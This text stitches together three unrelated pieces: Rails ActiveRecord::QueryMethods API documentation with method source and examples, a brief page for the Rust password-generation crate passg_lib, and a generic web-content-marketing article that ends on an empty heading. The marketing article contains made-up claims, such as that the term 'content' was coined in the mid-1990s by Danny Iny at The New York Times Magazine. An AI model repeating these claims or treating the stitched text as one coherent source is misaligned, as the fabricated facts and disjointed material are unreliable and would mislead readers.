Module: ActiveRecord::QueryMethods Extended by: ActiveSupport::Concern Includes: ActiveModel::ForbiddenAttributesProtection Included in: Relation Defined in: activerecord/lib/active_record/relation/query_methods.rb Defined Under Namespace Classes: WhereChain Constant Summary collapse FROZEN_EMPTY_ARRAY = [].freeze FROZEN_EMPTY_HASH = {}.freeze VALID_UNSCOPING_VALUES = Set.new([:where, :select, :group, :order, :lock, :limit, :offset, :joins, :left_outer_joins, :annotate, :includes, :from, :readonly, :having, :optimizer_hints]) Instance Method Summary collapse Methods included from ActiveSupport::Concern append_features, class_methods, extended, included Instance Method Details #_select!(*fields) ⇒ Object :nodoc: 281 282 283 284 285 286 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 281 def _select!(*fields) # :nodoc: fields.compact_blank! fields.flatten! self.select_values += fields self end #annotate(*args) ⇒ Object Adds an SQL comment to queries generated from this relation. For example: User.annotate("selecting user names").select(:name) # SELECT "users"."name" FROM "users" /* selecting user names */ User.annotate("selecting", "user", "names").select(:name) # SELECT "users"."name" FROM "users" /* selecting */ /* user */ /* names */ The SQL block comment delimiters, “/*” and “*/”, will be added automatically. 1006 1007 1008 1009 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1006 def annotate(*args) check_if_method_has_arguments!(:annotate, args) spawn.annotate!(*args) end #annotate!(*args) ⇒ Object Like #annotate, but modifies relation in place. 1012 1013 1014 1015 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1012 def annotate!(*args) # :nodoc: self.annotate_values += args self end #arel(aliases = nil) ⇒ Object Returns the Arel object associated with the relation. 1018 1019 1020 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1018 def arel(aliases = nil) # :nodoc: @arel ||= build_arel(aliases) end #construct_join_dependency(associations, join_type) ⇒ Object :nodoc: 1022 1023 1024 1025 1026 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1022 def construct_join_dependency(associations, join_type) # :nodoc: ActiveRecord::Associations::JoinDependency.new( klass, table, associations, join_type ) end #create_with(value) ⇒ Object Sets attributes to be used when creating new records from a relation object. users = User.where(name: 'Oscar') users.new.name # => 'Oscar' users = users.create_with(name: 'DHH') users.new.name # => 'DHH' You can pass nil to #create_with to reset attributes: users = users.create_with(nil) users.new.name # => 'Oscar' 839 840 841 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 839 def create_with(value) spawn.create_with!(value) end #create_with!(value) ⇒ Object :nodoc: 843 844 845 846 847 848 849 850 851 852 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 843 def create_with!(value) # :nodoc: if value value = sanitize_forbidden_attributes(value) self.create_with_value = create_with_value.merge(value) else self.create_with_value = FROZEN_EMPTY_HASH end self end #distinct(value = true) ⇒ Object Specifies whether the records should be unique or not. 
For example: User.select(:name) # Might return two records with the same name User.select(:name).distinct # Returns 1 record per distinct name User.select(:name).distinct.distinct(false) # You can also remove the uniqueness 886 887 888 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 886 def distinct(value = true) spawn.distinct!(value) end #distinct!(value = true) ⇒ Object Like #distinct, but modifies relation in place. 891 892 893 894 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 891 def distinct!(value = true) # :nodoc: self.distinct_value = value self end #eager_load(*args) ⇒ Object Forces eager loading by performing a LEFT OUTER JOIN on args: User.eager_load(:posts) # SELECT "users"."id" AS t0_r0, "users"."name" AS t0_r1, ... # FROM "users" LEFT OUTER JOIN "posts" ON "posts"."user_id" = # "users"."id" 168 169 170 171 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 168 def eager_load(*args) check_if_method_has_arguments!(:eager_load, args) spawn.eager_load!(*args) end #eager_load!(*args) ⇒ Object :nodoc: 173 174 175 176 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 173 def eager_load!(*args) # :nodoc: self.eager_load_values += args self end #extending(*modules, &block) ⇒ Object Used to extend a scope with additional methods, either through a module or through a block provided. The object returned is a relation, which can be further extended. Using a module module Pagination def page(number) # pagination code goes here end end scope = Model.all.extending(Pagination) scope.page(params[:page]) You can also pass a list of modules: scope = Model.all.extending(Pagination, SomethingElse) Using a block scope = Model.all.extending do def page(number) # pagination code goes here end end scope.page(params[:page]) You can also use a block and a module list: scope = Model.all.extending(Pagination) do def per_page(number) # pagination code goes here end end 932 933 934 935 936 937 938 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 932 def extending(*modules, &block) if modules.any? || block spawn.extending!(*modules, &block) else self end end #extending!(*modules, &block) ⇒ Object :nodoc: 940 941 942 943 944 945 946 947 948 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 940 def extending!(*modules, &block) # :nodoc: modules << Module.new(&block) if block modules.flatten! self.extending_values += modules extend(*extending_values) if extending_values.any? self end #extract_associated(association) ⇒ Object Extracts a named association from the relation. The named association is first preloaded, then the individual association records are collected from the relation. Like so: .memberships.extract_associated(:user) # => Returns collection of User records This is short-hand for: .memberships.preload(:user).collect(&:user) 201 202 203 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 201 def extract_associated(association) preload(association).collect(&association) end #from(value, subquery_name = nil) ⇒ Object Specifies table from which the records will be fetched. For example: Topic.select('title').from('posts') # SELECT title FROM posts Can accept other relation objects. 
For example: Topic.select('title').from(Topic.approved) # SELECT title FROM (SELECT * FROM topics WHERE approved = 't') subquery Topic.select('a.title').from(Topic.approved, :a) # SELECT a.title FROM (SELECT * FROM topics WHERE approved = 't') a 867 868 869 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 867 def from(value, subquery_name = nil) spawn.from!(value, subquery_name) end #from!(value, subquery_name = nil) ⇒ Object :nodoc: 871 872 873 874 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 871 def from!(value, subquery_name = nil) # :nodoc: self.from_clause = Relation::FromClause.new(value, subquery_name) self end #group(*args) ⇒ Object Allows to specify a group attribute: User.group(:name) # SELECT "users".* FROM "users" GROUP BY name Returns an array with distinct records based on the group attribute: User.select([:id, :name]) # => [#<User id: 1, name: "Oscar">, #<User id: 2, name: "Oscar">, #<User id: 3, name: "Foo">] User.group(:name) # => [#<User id: 3, name: "Foo", ...>, #<User id: 2, name: "Oscar", ...>] User.group('name AS grouped_name, age') # => [#<User id: 3, name: "Foo", age: 21, ...>, #<User id: 2, name: "Oscar", age: 21, ...>, #<User id: 5, name: "Foo", age: 23, ...>] Passing in an array of attributes to group by is also supported. User.select([:id, :first_name]).group(:id, :first_name).first(3) # => [#<User id: 1, first_name: "Bill">, #<User id: 2, first_name: "Earl">, #<User id: 3, first_name: "Beto">] 329 330 331 332 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 329 def group(*args) check_if_method_has_arguments!(:group, args) spawn.group!(*args) end #group!(*args) ⇒ Object :nodoc: 334 335 336 337 338 339 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 334 def group!(*args) # :nodoc: args.flatten! self.group_values += args self end #having(opts, *rest) ⇒ Object Allows to specify a HAVING clause. Note that you can’t use HAVING without also specifying a GROUP clause. Order.having('SUM(price) > 30').group('user_id') 716 717 718 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 716 def having(opts, *rest) opts.blank? ? self : spawn.having!(opts, *rest) end #having!(opts, *rest) ⇒ Object :nodoc: 720 721 722 723 724 725 726 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 720 def having!(opts, *rest) # :nodoc: opts = sanitize_forbidden_attributes(opts) references!(PredicateBuilder.references(opts)) if Hash === opts self.having_clause += having_clause_factory.build(opts, rest) self end #includes(*args) ⇒ Object Specify relationships to be included in the result set. For example: users = User.includes(:address) users.each do |user| user.address.city end allows you to access the address attribute of the User model without firing an additional query. This will often result in a performance improvement over a simple join. You can also specify multiple relationships, like this: users = User.includes(:address, :friends) Loading nested relationships is possible using a Hash: users = User.includes(:address, friends: [:address, :followers]) conditions If you want to add string conditions to your included models, you’ll have to explicitly reference them. For example: User.includes(:posts).where('posts.name = ?', 'example') Will throw an error, but this will work: User.includes(:posts).where('posts.name = ?', 'example').references(:posts) Note that #includes works with association names while #references needs the actual table name. 
If you pass the conditions via hash, you don’t need to call #references explicitly, as #where references the tables for you. For example, this will work correctly: User.includes(:posts).where(posts: { name: 'example' }) 149 150 151 152 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 149 def includes(*args) check_if_method_has_arguments!(:includes, args) spawn.includes!(*args) end #includes!(*args) ⇒ Object :nodoc: 154 155 156 157 158 159 160 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 154 def includes!(*args) # :nodoc: args.compact_blank! args.flatten! self.includes_values |= args self end #joins(*args) ⇒ Object Performs a joins on args. The given symbol(s) should match the name of the association(s). User.joins(:posts) # SELECT "users".* # FROM "users" # INNER JOIN "posts" ON "posts"."user_id" = "users"."id" Multiple joins: User.joins(:posts, :account) # SELECT "users".* # FROM "users" # INNER JOIN "posts" ON "posts"."user_id" = "users"."id" # INNER JOIN "accounts" ON "accounts"."id" = "users"."account_id" Nested joins: User.joins(posts: [:comments]) # SELECT "users".* # FROM "users" # INNER JOIN "posts" ON "posts"."user_id" = "users"."id" # INNER JOIN "comments" "comments_posts" # ON "comments_posts"."post_id" = "posts"."id" You can use strings in order to customize your joins: User.joins("LEFT JOIN bookmarks ON bookmarks.bookmarkable_type = 'Post' AND bookmarks.user_id = users.id") # SELECT "users".* FROM "users" LEFT JOIN bookmarks ON bookmarks.bookmarkable_type = 'Post' AND bookmarks.user_id = users.id 497 498 499 500 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 497 def joins(*args) check_if_method_has_arguments!(:joins, args) spawn.joins!(*args) end #joins!(*args) ⇒ Object :nodoc: 502 503 504 505 506 507 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 502 def joins!(*args) # :nodoc: args.compact! args.flatten! self.joins_values += args self end #left_outer_joins(*args) ⇒ Object Also known as: left_joins Performs a left outer joins on args: User.left_outer_joins(:posts) => SELECT "users".* FROM "users" LEFT OUTER JOIN "posts" ON "posts"."user_id" = "users"."id" 514 515 516 517 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 514 def left_outer_joins(*args) check_if_method_has_arguments!(__callee__, args) spawn.left_outer_joins!(*args) end #left_outer_joins!(*args) ⇒ Object :nodoc: 520 521 522 523 524 525 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 520 def left_outer_joins!(*args) # :nodoc: args.compact! args.flatten! self.left_outer_joins_values += args self end #limit(value) ⇒ Object Specifies a limit for the number of records to retrieve. User.limit(10) # generated SQL has 'LIMIT 10' User.limit(10).limit(20) # generated SQL has 'LIMIT 20' 733 734 735 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 733 def limit(value) spawn.limit!(value) end #limit!(value) ⇒ Object :nodoc: 737 738 739 740 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 737 def limit!(value) # :nodoc: self.limit_value = value self end #lock(locks = true) ⇒ Object Specifies locking settings (default to true). For more information on locking, please see ActiveRecord::Locking. 
760 761 762 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 760 def lock(locks = true) spawn.lock!(locks) end #lock!(locks = true) ⇒ Object :nodoc: 764 765 766 767 768 769 770 771 772 773 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 764 def lock!(locks = true) # :nodoc: case locks when String, TrueClass, NilClass self.lock_value = locks || true else self.lock_value = false end self end #noneObject Returns a chainable relation with zero records. The returned relation implements the Null Object pattern. It is an object with defined null behavior and always returns an empty array of records without querying the database. Any subsequent condition chained to the returned relation will continue generating an empty relation and will not fire any query to the database. Used in cases where a method or scope could return zero records but the result needs to be chainable. For example: @posts = current_user.visible_posts.where(name: params[:name]) # the visible_posts method is expected to return a chainable Relation def visible_posts case role when 'Country Manager' Post.where(country: country) when 'Reviewer' Post.published when 'Bad User' Post.none # It can't be chained if [] is returned. end end 803 804 805 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 803 def none spawn.none! end #none!Object :nodoc: 807 808 809 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 807 def none! # :nodoc: where!("1=0").extending!(NullRelation) end #offset(value) ⇒ Object Specifies the number of rows to skip before returning rows. User.offset(10) # generated SQL has "OFFSET 10" Should be used with order. User.offset(10).order("name ASC") 749 750 751 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 749 def offset(value) spawn.offset!(value) end #offset!(value) ⇒ Object :nodoc: 753 754 755 756 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 753 def offset!(value) # :nodoc: self.offset_value = value self end #optimizer_hints(*args) ⇒ Object Specify optimizer hints to be used in the SELECT statement. Example (for MySQL): Topic.optimizer_hints("MAX_EXECUTION_TIME(50000)", "NO_INDEX_MERGE(topics)") # SELECT /*+ MAX_EXECUTION_TIME(50000) NO_INDEX_MERGE(topics) */ `topics`.* FROM `topics` Example (for PostgreSQL with pg_hint_plan): Topic.optimizer_hints("SeqScan(topics)", "Parallel(topics 8)") # SELECT /*+ SeqScan(topics) Parallel(topics 8) */ "topics".* FROM "topics" 961 962 963 964 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 961 def optimizer_hints(*args) check_if_method_has_arguments!(:optimizer_hints, args) spawn.optimizer_hints!(*args) end #optimizer_hints!(*args) ⇒ Object :nodoc: 966 967 968 969 970 971 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 966 def optimizer_hints!(*args) # :nodoc: args.flatten! self.optimizer_hints_values |= args self end #or(other) ⇒ Object Returns a new relation, which is the logical union of this relation and the one passed as an argument. The two relations must be structurally compatible: they must be scoping the same model, and they must differ only by #where (if no #group has been defined) or #having (if a #group is present). Neither relation may have a #limit, #offset, or #distinct set. 
Post.where("id = 1").or(Post.where("author_id = 3")) # SELECT `posts`.* FROM `posts` WHERE ((id = 1) OR (author_id = 3)) 690 691 692 693 694 695 696 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 690 def or(other) unless other.is_a? Relation raise ArgumentError, "You have passed #{other.class.name} object to #or. Pass an ActiveRecord::Relation object instead." end spawn.or!(other) end #or!(other) ⇒ Object :nodoc: 698 699 700 701 702 703 704 705 706 707 708 709 710 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 698 def or!(other) # :nodoc: incompatible_values = structurally_incompatible_values_for_or(other) unless incompatible_values.empty? raise ArgumentError, "Relation passed to #or must be structurally compatible. Incompatible values: #{incompatible_values}" end self.where_clause = self.where_clause.or(other.where_clause) self.having_clause = having_clause.or(other.having_clause) self.references_values += other.references_values self end #order(*args) ⇒ Object Allows to specify an order attribute: User.order(:name) # SELECT "users".* FROM "users" ORDER BY "users"."name" ASC User.order(email: :desc) # SELECT "users".* FROM "users" ORDER BY "users"."email" DESC User.order(:name, email: :desc) # SELECT "users".* FROM "users" ORDER BY "users"."name" ASC, "users"."email" DESC User.order('name') # SELECT "users".* FROM "users" ORDER BY name User.order('name DESC') # SELECT "users".* FROM "users" ORDER BY name DESC User.order('name DESC, email') # SELECT "users".* FROM "users" ORDER BY name DESC, email 360 361 362 363 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 360 def order(*args) check_if_method_has_arguments!(:order, args) spawn.order!(*args) end #order!(*args) ⇒ Object Same as #order but operates on relation in-place instead of copying. 366 367 368 369 370 371 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 366 def order!(*args) # :nodoc: preprocess_order_args(args) self.order_values += args self end #preload(*args) ⇒ Object Allows preloading of args, in the same way that #includes does: User.preload(:posts) # SELECT "posts".* FROM "posts" WHERE "posts"."user_id" IN (1, 2, 3) 182 183 184 185 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 182 def preload(*args) check_if_method_has_arguments!(:preload, args) spawn.preload!(*args) end #preload!(*args) ⇒ Object :nodoc: 187 188 189 190 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 187 def preload!(*args) # :nodoc: self.preload_values += args self end #readonly(value = true) ⇒ Object Sets readonly attributes for the returned relation. If value is true (default), attempting to update a record will result in an error. users = User.readonly users.first.save => ActiveRecord::ReadOnlyRecord: User is marked as readonly 817 818 819 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 817 def readonly(value = true) spawn.readonly!(value) end #readonly!(value = true) ⇒ Object :nodoc: 821 822 823 824 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 821 def readonly!(value = true) # :nodoc: self.readonly_value = value self end #references(*table_names) ⇒ Object Use to indicate that the given table_names are referenced by an SQL string, and should therefore be JOINed in any query rather than loaded separately. This method only works in conjunction with #includes. See #includes for more details. 
User.includes(:posts).where("posts.name = 'foo'") # Doesn't JOIN the posts table, resulting in an error. User.includes(:posts).where("posts.name = 'foo'").references(:posts) # Query now knows the string references posts, so adds a JOIN 215 216 217 218 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 215 def references(*table_names) check_if_method_has_arguments!(:references, table_names) spawn.references!(*table_names) end #references!(*table_names) ⇒ Object :nodoc: 220 221 222 223 224 225 226 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 220 def references!(*table_names) # :nodoc: table_names.flatten! table_names.map!(&:to_s) self.references_values |= table_names self end #reorder(*args) ⇒ Object Replaces any existing order defined on the relation with the specified order. User.order('email DESC').reorder('id ASC') # generated SQL has 'ORDER BY id ASC' Subsequent calls to order on the same relation will be appended. For example: User.order('email DESC').reorder('id ASC').order('name ASC') generates a query with ‘ORDER BY id ASC, name ASC’. 382 383 384 385 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 382 def reorder(*args) check_if_method_has_arguments!(:reorder, args) spawn.reorder!(*args) end #reorder!(*args) ⇒ Object Same as #reorder but operates on relation in-place instead of copying. 388 389 390 391 392 393 394 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 388 def reorder!(*args) # :nodoc: preprocess_order_args(args) unless args.all?(&:blank?) self.reordering_value = true self.order_values = args self end #reselect(*args) ⇒ Object Allows you to change a previously set select statement. Post.select(:title, :body) # SELECT `posts`.`title`, `posts`.`body` FROM `posts` Post.select(:title, :body).reselect(:created_at) # SELECT `posts`.`created_at` FROM `posts` This is short-hand for unscope(:select).select(fields). Note that we’re unscoping the entire select statement. 298 299 300 301 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 298 def reselect(*args) check_if_method_has_arguments!(:reselect, args) spawn.reselect!(*args) end #reselect!(*args) ⇒ Object Same as #reselect but operates on relation in-place instead of copying. 304 305 306 307 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 304 def reselect!(*args) # :nodoc: self.select_values = args self end #reverse_orderObject Reverse the existing order clause on the relation. User.order('name ASC').reverse_order # generated SQL has 'ORDER BY name DESC' 976 977 978 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 976 def reverse_order spawn.reverse_order! end #reverse_order!Object :nodoc: 980 981 982 983 984 985 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 980 def reverse_order! # :nodoc: orders = order_values.uniq orders.compact_blank! self.order_values = reverse_sql_order(orders) self end #rewhere(conditions) ⇒ Object Allows you to change a previously set where condition for a given attribute, instead of appending to that condition. Post.where(trashed: true).where(trashed: false) # WHERE `trashed` = 1 AND `trashed` = 0 Post.where(trashed: true).rewhere(trashed: false) # WHERE `trashed` = 0 Post.where(active: true).where(trashed: true).rewhere(trashed: false) # WHERE `active` = 1 AND `trashed` = 0 This is short-hand for unscope(where: conditions.keys).where(conditions). 
Note that unlike reorder, we’re only unscoping the named conditions – not the entire where statement. 676 677 678 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 676 def rewhere(conditions) unscope(where: conditions.keys).where(conditions) end #select(*fields) ⇒ Object Works in two unique ways. First: takes a block so it can be used just like Array#select. Model.all.select { |m| m.field == value } This will build an array of objects from the database for the scope, converting them into an array and iterating through them using Array#select. Second: Modifies the SELECT statement for the query so that only certain fields are retrieved: Model.select(:field) # => [#<Model id: nil, field: "value">] Although in the above example it looks as though this method returns an array, it actually returns a relation object and can have other query methods appended to it, such as the other methods in ActiveRecord::QueryMethods. The argument to the method can also be an array of fields. Model.select(:field, :other_field, :and_one_more) # => [#<Model id: nil, field: "value", other_field: "value", and_one_more: "value">] You can also use one or more strings, which will be used unchanged as SELECT fields. Model.select('field AS field_one', 'other_field AS field_two') # => [#<Model id: nil, field: "value", other_field: "value">] If an alias was specified, it will be accessible from the resulting objects: Model.select('field AS field_one').first.field_one # => "value" Accessing attributes of an object that do not have fields retrieved by a select except id will throw ActiveModel::MissingAttributeError: Model.select(:field).first.other_field # => ActiveModel::MissingAttributeError: missing attribute: other_field Raises: • (ArgumentError) 268 269 270 271 272 273 274 275 276 277 278 279 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 268 def select(*fields) if block_given? if fields.any? raise ArgumentError, "`select' with block doesn't take arguments." end return super() end raise ArgumentError, "Call `select' with at least one field" if fields.empty? spawn._select!(*fields) end #skip_preloading!Object :nodoc: 992 993 994 995 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 992 def skip_preloading! # :nodoc: self.skip_preloading_value = true self end #skip_query_cache!(value = true) ⇒ Object :nodoc: 987 988 989 990 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 987 def skip_query_cache!(value = true) # :nodoc: self.skip_query_cache_value = value self end #unscope(*args) ⇒ Object Removes an unwanted relation that is already defined on a chain of relations. This is useful when passing around chains of relations and would like to modify the relations without reconstructing the entire chain. User.order('email DESC').unscope(:order) == User.all The method arguments are symbols which correspond to the names of the methods which should be unscoped. The valid arguments are given in VALID_UNSCOPING_VALUES. The method can also be called with multiple arguments. For example: User.order('email DESC').select('id').where(name: "John") .unscope(:order, :select, :where) == User.all One can additionally pass a hash as an argument to unscope specific :where values. This is done by passing a hash with a single key-value pair. The key should be :where and the value should be the where value to unscope. 
For example: User.where(name: "John", active: true).unscope(where: :name) == User.where(active: true) This method is similar to #except, but unlike #except, it persists across merges: User.order('email').merge(User.except(:order)) == User.order('email') User.order('email').merge(User.unscope(:order)) == User.all This means it can be used in association definitions: has_many :comments, -> { unscope(where: :trashed) } 433 434 435 436 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 433 def unscope(*args) check_if_method_has_arguments!(:unscope, args) spawn.unscope!(*args) end #unscope!(*args) ⇒ Object :nodoc: 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 438 def unscope!(*args) # :nodoc: args.flatten! self.unscope_values += args args.each do |scope| case scope when Symbol scope = :left_outer_joins if scope == :left_joins if !VALID_UNSCOPING_VALUES.include?(scope) raise ArgumentError, "Called unscope() with invalid unscoping argument ':#{scope}'. Valid arguments are :#{VALID_UNSCOPING_VALUES.to_a.join(", :")}." end assert_mutability! @values.delete(scope) when Hash scope.each do |key, target_value| if key != :where raise ArgumentError, "Hash arguments in .unscope(*args) must have :where as the key." end target_values = Array(target_value).map(&:to_s) self.where_clause = where_clause.except(*target_values) end else raise ArgumentError, "Unrecognized scoping: #{args.inspect}. Use .unscope(where: :attribute_name) or .unscope(:order), for example." end end self end #where(opts = :chain, *rest) ⇒ Object Returns a new relation, which is the result of filtering the current relation according to the conditions in the arguments. #where accepts conditions in one of several formats. In the examples below, the resulting SQL is given as an illustration; the actual query generated may be different depending on the database adapter. string A single string, without additional arguments, is passed to the query constructor as an SQL fragment, and used in the where clause of the query. Client.where("orders_count = '2'") # SELECT * from clients where orders_count = '2'; Note that building your own string from user input may expose your application to injection attacks if not done properly. As an alternative, it is recommended to use one of the following methods. array If an array is passed, then the first element of the array is treated as a template, and the remaining elements are inserted into the template to generate the condition. Active Record takes care of building the query to avoid injection attacks, and will convert from the ruby type to the database type where needed. Elements are inserted into the string in the order in which they appear. User.where(["name = ? and email = ?", "Joe", "[email protected]"]) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; Alternatively, you can use named placeholders in the template, and pass a hash as the second element of the array. The names in the template are replaced with the corresponding values from the hash. User.where(["name = :name and email = :email", { name: "Joe", email: "[email protected]" }]) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; This can make for more readable code in complex queries. Lastly, you can use sprintf-style % escapes in the template. 
This works slightly differently than the previous methods; you are responsible for ensuring that the values in the template are properly quoted. The values are passed to the connector for quoting, but the caller is responsible for ensuring they are enclosed in quotes in the resulting SQL. After quoting, the values are inserted using the same escapes as the Ruby core method Kernel::sprintf. User.where(["name = '%s' and email = '%s'", "Joe", "[email protected]"]) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; If #where is called with multiple arguments, these are treated as if they were passed as the elements of a single array. User.where("name = :name and email = :email", { name: "Joe", email: "[email protected]" }) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; When using strings to specify conditions, you can use any operator available from the database. While this provides the most flexibility, you can also unintentionally introduce dependencies on the underlying database. If your code is intended for general consumption, test with multiple database backends. hash #where will also accept a hash condition, in which the keys are fields and the values are values to be searched for. Fields can be symbols or strings. Values can be single values, arrays, or ranges. User.where({ name: "Joe", email: "[email protected]" }) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]' User.where({ name: ["Alice", "Bob"]}) # SELECT * FROM users WHERE name IN ('Alice', 'Bob') User.where({ created_at: (Time.now.midnight - 1.day)..Time.now.midnight }) # SELECT * FROM users WHERE (created_at BETWEEN '2012-06-09 07:00:00.000000' AND '2012-06-10 07:00:00.000000') In the case of a belongs_to relationship, an association key can be used to specify the model if an ActiveRecord object is used as the value. author = Author.find(1) # The following queries will be equivalent: Post.where(author: author) Post.where(author_id: author) This also works with polymorphic belongs_to relationships: treasure = Treasure.create(name: 'gold coins') treasure.price_estimates << PriceEstimate.create(price: 125) # The following queries will be equivalent: PriceEstimate.where(estimate_of: treasure) PriceEstimate.where(estimate_of_type: 'Treasure', estimate_of_id: treasure) Joins If the relation is the result of a join, you may create a condition which uses any of the tables in the join. For string and array conditions, use the table name in the condition. User.joins(:posts).where("posts.created_at < ?", Time.now) For hash conditions, you can either use the table name in the key, or use a sub-hash. User.joins(:posts).where({ "posts.published" => true }) User.joins(:posts).where({ posts: { published: true } }) no argument If no argument is passed, #where returns a new instance of WhereChain, that can be chained with #not to return a new relation that negates the where clause. User.where.not(name: "Jon") # SELECT * FROM users WHERE name != 'Jon' See WhereChain for more details on #not. blank condition If the condition is any blank-ish object, then #where is a no-op and returns the current relation. 646 647 648 649 650 651 652 653 654 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 646 def where(opts = :chain, *rest) if :chain == opts WhereChain.new(spawn) elsif opts.blank? 
self else spawn.where!(opts, *rest) end end #where!(opts, *rest) ⇒ Object :nodoc: 656 657 658 659 660 661 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 656 def where!(opts, *rest) # :nodoc: opts = sanitize_forbidden_attributes(opts) references!(PredicateBuilder.references(opts)) if Hash === opts self.where_clause += where_clause_factory.build(opts, rest) self end
Crate passg_lib

This library provides a convenient way to generate pseudorandom passwords according to some given constraints.

Example

```rust
use passg::prelude::*;

let generator = GeneratorBuilder::default().build();
let password = generator.generate();
```

Modules

• This module configures the collating sequences (aka charsets) that are available for generating a pseudo-random password.
• This module defines the error that might occur while using passg.
• This module defines the type used to configure and generate passwords.
• A prelude you can use to easily get started.
Web Content Development – The Complete Guide

Web content development is a huge and growing field. More websites are launching every single day, and web content is becoming increasingly important for search engine optimization (SEO). Most content is written and created in word processing programs, although video creation tools like Adobe After Effects are also used. Content can be articles, blogs, ebooks, white papers, or other types of materials, and it can be text-based, graphic-based, or a combination of both. The main purpose of creating content is to educate and inform people. This can include topics like health, fitness, beauty, finance, psychology, etc.

According to a survey by W3Techs, in 2015 there were over 1.8 billion websites, most of which contain content optimized for search engines. That's a lot of people looking to access content online. With all of that traffic, web content is the key to success. It's what will keep users on your site and what will help them become repeat visitors.

Content creation is a great way to earn money online. Many people have made a living at it, and many more have found the process satisfying and rewarding. The great thing about content creation is that there are many different ways to get paid. You can write blogs, articles, guides, reviews, and more. And with the right social media connections, you can get clients to pay you directly. There's a lot of competition for freelance writers, but the demand for content is high, so I recommend you get started today.

What is content marketing?

Content development is an important part of your online business. If you aren't writing content, you're probably doing something else wrong. That said, it's not the only part of the puzzle. Content is only valuable if someone wants to read it. But you can't just write something and expect people to find it. You need to make sure you're distributing it in a way that maximizes its value to readers.

Content development is one of the most important things you can do to make money online. The most effective web content is not necessarily the content that gets the most views, but the content that keeps users engaged and coming back for more. It's not as easy as it sounds, but with the right tools you can produce excellent content without having to go to school. There are tons of online courses available. Some of them are good, while others are terrible, so do your research before you invest your time and money in anything.

What is content development?

The goal of content development is to provide valuable information to your audience. It is also an excellent way to drive traffic to your site. Whether you are just starting out or already have a successful site, there is always room for improvement. By ensuring your content is high-quality and interesting, you can increase the likelihood that people will stick around.

Here are some important things to consider if you are new to web content development. The first is finding a niche: something you enjoy, because the key to making money online is creating content people want. Your niche should also be profitable. If your niche is too competitive, few people will buy your content, and if it's too easy, you'll end up with nothing.

You should also have a plan. How do you intend to make money? Do you want to make a living, or just a little extra cash? There are a lot of ways to make money online.
Some people start by creating a website and making money by promoting products. Others focus on building a community and creating a mailing list. Another way to make money online is to become an affiliate marketer: you can earn a commission on each sale by promoting other people's products.

How to develop good content

The term "content" was coined in the mid-1990s by a writer named Danny Iny at The New York Times Magazine. As a content marketer, you may have noticed that many people seem to be talking about content marketing lately. That is because content marketing is the fastest-growing marketing trend of 2016. If you're looking for a way to build a profitable business, it's time to start investing in content.

Content marketing is one of the best ways to make money online. That's why I've created a comprehensive guide to content marketing and made it available for free. I hope you'll use it to launch your content marketing campaigns and make money online.

When you're first starting, you may think writing a blog post is going to be a piece of cake, but it takes time and practice to develop the ability to write compelling copy. Writing is a skill that requires patience and lots of practice. Once you master it, you'll be amazed at the quality and variety of work you can produce. As a writer, you'll be asked to create everything from short blurbs to articles, ebooks, and guides.

Content creation tips

